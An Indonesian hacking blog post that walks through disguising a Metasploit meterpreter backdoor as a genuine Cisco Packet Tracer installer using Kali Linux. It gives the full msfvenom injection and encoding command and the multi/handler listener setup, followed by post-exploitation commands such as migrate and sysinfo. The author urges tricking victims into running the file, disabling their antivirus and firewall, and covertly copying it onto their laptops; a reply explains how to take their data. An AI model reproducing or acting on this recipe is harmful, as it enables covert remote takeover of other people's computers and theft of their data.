Sunday, 7 February 2016

Hack Windows dengan Metasploit menggunakan Backdoor file Installer Di Kali Linux

halo fans, Nuenomaru disini .-.
kali ini Nuenomaru akan Share Tutorial Menyamarkan Backdoor Seperti file Installer(.exe) Di Kali Linux, Backdoor ini berguna untuk Hack & Remote Laptop/PC berSistem Operasi Windows ^^ *aloo Bill gates :v
Sebenernya, artikel ini hampir sama dgn postingan yang di tulis oleh admin OepilCore di Blog ini, dgn Tutorial Berjudul Hack Windows With Metasploit Using BackBox Linux.
yang membedakan Tutorial nya OepilCore dan Nue adalah, disini kita tidak memerlukan setoolkit , melainkan kita memerlukan file installer asli yang akan kita duplikat jadi backdoor. dan disini saya memakai Kali Linux, dan kalo OepilCore Memakai BackBox Linux *gak masalah sih wkwk, silahkan coba di pinguin2 kesayangan anda <(")

Sebelum melakukan eksploitasi ke sebuah sistem kita memerlukan backdoor yang digunakan untuk jalan masuk ke sistem korban. Agar exploit tersebut berjalan user diharuskan mengeksekusi backdoor tersebut, untuk itu kita diharuskan se-kreatif mungkin agar user tersebut mengesekusi backdoor yang dikirimkan, contohnya dengan menyamarkan backdoor  menyerupai file installer aplikasi.
Sebagai contoh kali ini saya akan menyamarkan backdoor seperti Cisco Packet Tracer (kalian juga dapat mencoba dengan file installer lainnya), disini tools yang digunakan adalah msfvenom dengan encoder shikata_ga_nai.


Play with Me Baby ;*



untuk melihat opsi dari perintah msfvenom ketikkan di terminal

msfvenom -h



Contoh disini file asli installer PacketTracer533 saya berada di /root/Download/PacketTracer533_setup.exe  dan hasil file outputnya akan saya simpan di folder /root/Desktop/ciscopacket.exe
(anda bisa bebas menggunakan file installer apa saja)

msfvenom -a x86 --platform windows -x /root/Downloads/PacketTracer533_setup.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o /root/Desktop/ciscopacket.exe



Keterangan :
- a adalah architecture yang digunakan
--platform adalah platform payload yang di buat
-x posisi atau letak file exe yang hendak di injeksi
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikkan payload sebagai thread baru
-p perintah untuk menentukan tipe payload
windows/meterpreter/reverse_tcp adalah tipe payload yang digunakan 
-lhost adalah alamat IP kita
-lport adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
-e untuk memilih encoder yang digunakan
x86/shikata_ga_nai adalah encoder yang digunakan
-i iterations (jumlah encode payload)
-f format output
-o output hasil file yang telah di injeksi ( backdoor result )


Oke, selanjutnya kita uji coba backdoor tersebut, buka msfconsole
Ketikan: msfconsole





Selanjutnya gunakan Perintah:

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 4444
exploit





Sesuaikan tipe PAYLOAD, LHOST dan LPORT dengan backdoor yang dibuat di atas

Langkah selanjutnya adalah mengirimkan backdoor tersebut ke target.
gimana pun caranya, mau si target di suruh download file kita kek, atau pura2 minta anime/JAV ke target, lalu diem2 copykan file kita ke Laptop Target. *uji kelicikan anda

Dibawah ini penampakan backdoor di komputer target


saya sarankan, disable antivirus + turn off firewall dilaptop milik korban

dilihat sepintas backdoor tersebut menyerupai file installer aslinya, icon dan detailnya pun sama 



lalu copykan file ke laptop milik korban, lalu jalankan/eksekusi ^^


Dan , Sesi meterpreter terbuka  :D


untuk melihat detail info laptop korban, ketikan: sysinfo



Meterpreter session akan closed, ketika target menutup file Installer tersebut, untuk  itu segera pindah ke prosses yang lain agar kita tetap mendapat sesi meterpreter, gunakan perintah

migrate 1500

Contoh di atas saya pindah ke explorer.exe , untuk melihat Procces List ketikkan
ps
xixixhi, silahkan pilih, anda mau pinda ke proses yang mana :v

Nah disini kita sudah masuk bebas meremote pc korban.
mau jahil ?? silahkan intip perintah2nya di artikelnya om oepilcore: Hack Windows With Metasploit Using BackBox Linux *walaupun itu backbox, perintahnya sama aja kok sama kek Kali Linux

Kalau serasa sudah puas :v
silahkan ketikan perintah: exit
untuk men Shutdown Meterpreter.



Mudahkan o.O ? Stay Cool and Keep ./Crotz ,gaes :'v


Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ Cyber Art
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Go OpenSource Indonesia~
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: Anherr Blog's





./Nuenomaru





























Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

2 comments

kalo mau mindahin atau mengambil datanya gmana ya?

silahkan gunakan command cp, mv dan nautilus :D

#Nuenomaru


EmoticonEmoticon